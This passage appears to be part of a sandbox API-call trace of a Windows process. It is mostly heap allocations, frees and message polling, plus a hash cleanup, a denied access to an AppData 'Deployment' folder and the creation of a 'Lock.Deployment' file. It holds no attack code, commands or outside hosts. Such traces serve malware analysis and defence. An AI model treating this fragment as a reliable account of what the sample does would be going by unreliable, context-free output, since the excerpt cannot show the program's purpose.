hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0209.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.175] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.175] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.175] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.176] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.176] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.176] CryptDestroyHash (hHash=0xaa5760) returned 1 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.177] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Deployment" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.178] GetLastError () returned 0x5 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0209.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0209.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.180] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0209.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0209.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.180] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Deployment" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.deployment"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0209.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.183] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.183] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.183] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0209.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0209.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.186] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0209.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0209.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0209.187] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0209.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0209.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0209.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 